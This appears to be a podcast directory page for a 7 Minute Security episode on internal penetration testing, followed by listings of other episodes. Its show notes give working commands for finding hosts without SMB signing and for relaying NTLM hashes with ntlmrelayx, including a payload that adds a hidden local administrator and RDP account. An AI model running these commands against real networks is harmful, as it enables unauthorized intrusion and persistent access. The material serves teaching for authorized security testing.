7MS #372: Tales of Internal Pentest Pwnage - Part 5
7 Minute Security15 Juli 2019

7MS #372: Tales of Internal Pentest Pwnage - Part 5

Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute

Today I share the (hopefully) exciting and fun conclusion to last week's episode about a tale of internal pentest pwnage! A few important notes from today's episode:

  • Need to find which hosts on your network have SMB signing disabled, and then get a nice clean list of IPs as a result? Try this:
opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt

Source: Pwning internal networks automagically

  • Ready to pass captured hashes from one host to another? Open responder.conf and turn SMB and HTTP to Off, then get Responder running in one window, and ntlmrelayx in another. Specifically, I like to use ntlmrelayx.py -tf targets.txt where targets.txt is the list of machines you found that are not using SMB signing. I also like to add a -c to run a string of my choice. Check out this fun evil little nugget:
net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add

So the full command would be:

ntlmrelayx.py -tf targets.txt -c 'net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add'

Check today's show notes at https://7ms.us for more information!

Avsnitt(720)

7MS #391: Securing Your Family During and After a Disaster - Part 3

7MS #391: Securing Your Family During and After a Disaster - Part 3

Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get ...

12 Dec 201949min

7MS #390: Tales of Internal Network Pentest Pwnage - Part 11

7MS #390: Tales of Internal Network Pentest Pwnage - Part 11

Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get ...

6 Dec 20191h 2min

7MS #389: Securing Your Family During and After a Disaster - Part 2

7MS #389: Securing Your Family During and After a Disaster - Part 2

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent...

21 Nov 201936min

7MS #388: Securing Your Family During and After a Disaster - Part 1

7MS #388: Securing Your Family During and After a Disaster - Part 1

In today's episode I talk about how my family's house and two vehicles were recently destroyed in a fire. The Johnson family is all ok - no injuries, thank God. However, this has turned our world upsi...

15 Nov 20191h 14min

7MS #387: How to Succeed in Business Without Really Crying - Part 7

7MS #387: How to Succeed in Business Without Really Crying - Part 7

Today's episode features a few important changes to the tools and services I use to run 7MS: Docusign is out and (sort of) replaced with Proposify Voltage SecureMail is out and replaced by ShareFile ...

11 Nov 201956min

7MS #386: Interview with Ryan Manship and Dave Dobrotka - Part 4

7MS #386: Interview with Ryan Manship and Dave Dobrotka - Part 4

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent...

1 Nov 20191h 24min

7MS #385: A Peek into the 7MS Mail Bag

7MS #385: A Peek into the 7MS Mail Bag

Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get ...

22 Okt 201944min

7MS #384: Creating Kick-Butt Credential-Capturing Phishing Campaigns

7MS #384: Creating Kick-Butt Credential-Capturing Phishing Campaigns

In this episode I talk about some things I learned about making your own kick-butt cred-capturing phishing campaign and how to do so on the (relatively) quick and (relatively) cheap! These tips includ...

12 Okt 201950min

Populärt inom Politik & nyheter

aftonbladet-krim
p3-krim
rss-krimstad
spar
aftonbladet-daily
svenska-fall
politiken
flashback-forever
rss-expressen-dok
rss-sanning-konsekvens
rss-krimreportrarna
kungligt
ett-rent-noje
rss-vad-fan-hande
motiv
rss-frandfors-horna
blenda-2
rss-flodet
krimmagasinet
svd-ledarredaktionen